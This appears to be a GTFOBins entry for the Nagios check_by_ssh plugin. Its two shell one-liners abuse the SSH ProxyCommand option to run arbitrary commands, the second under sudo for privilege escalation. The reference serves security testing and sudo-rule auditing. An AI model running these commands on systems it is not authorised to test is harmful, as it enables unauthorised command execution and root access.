GTFOBins.github.io/_gtfobins/check_by_ssh.md

572 B

description functions
This is the `check_by_ssh` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`.
command sudo
code
COMMAND=id OUTPUT=output_file TF=$(mktemp) echo "ProxyCommand $COMMAND | tee $OUTPUT" > $TF check_by_ssh -F $TF -H localhost -C something cat $OUTPUT
code
COMMAND=id OUTPUT=output_file TF=$(mktemp) echo "ProxyCommand $COMMAND | tee $OUTPUT" > $TF sudo check_by_ssh -F $TF -H localhost -C something cat $OUTPUT